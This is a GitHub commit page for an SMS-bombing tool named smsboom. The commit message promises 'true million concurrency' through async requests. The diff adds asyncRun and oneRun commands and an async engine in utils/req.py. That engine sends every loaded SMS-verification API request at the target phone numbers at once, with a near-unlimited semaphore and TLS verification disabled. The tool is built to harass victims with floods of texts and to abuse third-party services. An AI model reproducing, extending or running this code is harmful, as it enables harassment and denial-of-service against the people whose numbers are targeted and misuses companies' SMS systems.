Skip to content

Commit

Permalink
✨ feat: 使用异步实现真百万并发
Browse files Browse the repository at this point in the history
  • Loading branch information
WhaleFell committed May 14, 2022
1 parent 2334006 commit 9caf2fc
Show file tree
Hide file tree
Showing 3 changed files with 105 additions and 18 deletions.
12 changes: 1 addition & 11 deletions flask_app/utils.py
Original file line number Diff line number Diff line change
@@ -1,6 +1,5 @@
# encoding=utf8
import httpx
# import requests
from .model import API, default_header


Expand All @@ -24,16 +23,7 @@ def test_resq(api: API, phone) -> httpx.Response:
print('json')
resp = client.request(
method=api.method, headers=api.header, url=api.url, json=api.data)

# 验证不是 httpx 的问题...
# if not isinstance(api.data, dict):
# print("data")
# resp = requests.request(method=api.method, headers=api.header,
# url=api.url, data=api.data)
# else:
# print('json')
# resp = requests.request(
# method=api.method, headers=api.header, url=api.url, json=api.data)

return resp


Expand Down
33 changes: 32 additions & 1 deletion smsboom.py
Original file line number Diff line number Diff line change
Expand Up @@ -6,14 +6,15 @@
import time
from concurrent.futures import ThreadPoolExecutor
from typing import List, Union
import asyncio

import click
import httpx

from utils import default_header
from utils.log import logger
from utils.models import API
from utils.req import reqFunc
from utils.req import reqFunc, runAsync

# current directory
path = pathlib.Path(__file__).parent
Expand Down Expand Up @@ -43,6 +44,7 @@ def load_json() -> List[API]:
# return None
raise ValueError


def load_getapi() -> list:
"""load GETAPI
:return:
Expand Down Expand Up @@ -99,6 +101,33 @@ def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = Fals
pool.submit(reqFunc, api_get, phone)


@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True)
@click.command()
def asyncRun(phone):
"""以最快的方式请求接口(真异步百万并发)"""
_api = load_json()
_api_get = load_getapi()
apis = _api+_api_get

loop = asyncio.get_event_loop()
loop.run_until_complete(runAsync(apis, phone))


@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True)
@click.command()
def oneRun(phone):
"""单线程(测试使用)"""
_api = load_json()
_api_get = load_getapi()
apis = _api+_api_get

for api in apis:
try:
reqFunc(api, phone)
except:
pass


@click.command()
def update():
"""从 github 获取最新接口"""
Expand Down Expand Up @@ -130,6 +159,8 @@ def cli():

cli.add_command(run)
cli.add_command(update)
cli.add_command(asyncRun)
cli.add_command(oneRun)


if __name__ == "__main__":
Expand Down
78 changes: 72 additions & 6 deletions utils/req.py
Original file line number Diff line number Diff line change
@@ -1,24 +1,26 @@
# encoding=utf8
# 请求的方法
import httpx
from typing import Union
from httpx import Limits
from typing import Union, List
import asyncio

from utils import default_header
from utils.models import API
from utils.log import logger


def reqAPI(api: API, client: httpx.Client) -> httpx.Response:
def reqAPI(api: API, client: Union[httpx.Client, httpx.AsyncClient]) -> httpx.Response:
if isinstance(api.data, dict):
resp = client.request(method=api.method, json=api.data,
headers=api.header, url=api.url)
headers=api.header, url=api.url, timeout=10)
else:
resp = client.request(method=api.method, data=api.data,
headers=api.header, url=api.url)
headers=api.header, url=api.url, timeout=10)
return resp


def reqFunc(api: Union[API, str], phone: Union[tuple, str]):
def reqFunc(api: Union[API, str], phone: Union[tuple, str]) -> bool:
"""请求接口方法"""
# 多手机号支持
if isinstance(phone, tuple):
Expand All @@ -34,10 +36,74 @@ def reqFunc(api: Union[API, str], phone: Union[tuple, str]):
resp = reqAPI(api, client)
logger.info(f"{api.desc}-{resp.text[:30]}")
else:
api = api.replace("[phone]", ph)
api = api.replace("[phone]", ph).replace(" ", "").replace('\n', '').replace('\r', '')
resp = client.get(url=api, headers=default_header)
logger.info(f"GETAPI接口-{resp.text[:30]}")
return True
except httpx.HTTPError as why:
logger.error(f"请求失败{why}")
return False


async def asyncReqs(src: Union[API, str], phone: Union[tuple, str], semaphore):
"""异步请求方法
:param:
:return:
"""
# 多手机号支持
if isinstance(phone, tuple):
phone_lst = [_ for _ in phone]
else:
phone_lst = [phone]
async with semaphore:
async with httpx.AsyncClient(
limits=Limits(max_connections=1000,
max_keepalive_connections=2000),
headers=default_header,
verify=False,
timeout=99999
) as c:

for ph in phone_lst:
try:
if isinstance(src, API):
src = src.handle_API(ph)
r = await reqAPI(src, c)
else:
# 利用元组传参安全因为元组不可修改
s = (src.replace(" ", "").replace("\n", "").replace("\t", "").replace(
"&", "").replace('\n', '').replace('\r', ''),)
r = await c.get(*s)
return r
except httpx.HTTPError as why:
logger.error(f"异步请求失败{type(why)}")
# logger.error(f"异步请求失败{why}")
# import aiofiles
# async with aiofiles.open("error.txt","a",encoding="utf-8") as f:
# await f.write(f"{str(s[0]) if str(s[0]) else str(src)}\n")
except TypeError:
logger.error("类型错误")
except Exception as wy:
logger.exception(f"异步失败{wy}")


def callback(result):
"""异步回调函数"""
log = result.result()
if log is not None:
logger.info(f"请求结果:{log.text[:30]}")


async def runAsync(apis: List[Union[API,str]], phone: Union[tuple, str]):

tasks = []

for api in apis:
semaphore = asyncio.Semaphore(999999)
task = asyncio.ensure_future(asyncReqs(api, phone, semaphore))
task.add_done_callback(callback)
tasks.append(task)

await asyncio.gather(
*tasks
)

0 comments on commit 9caf2fc

Please sign in to comment.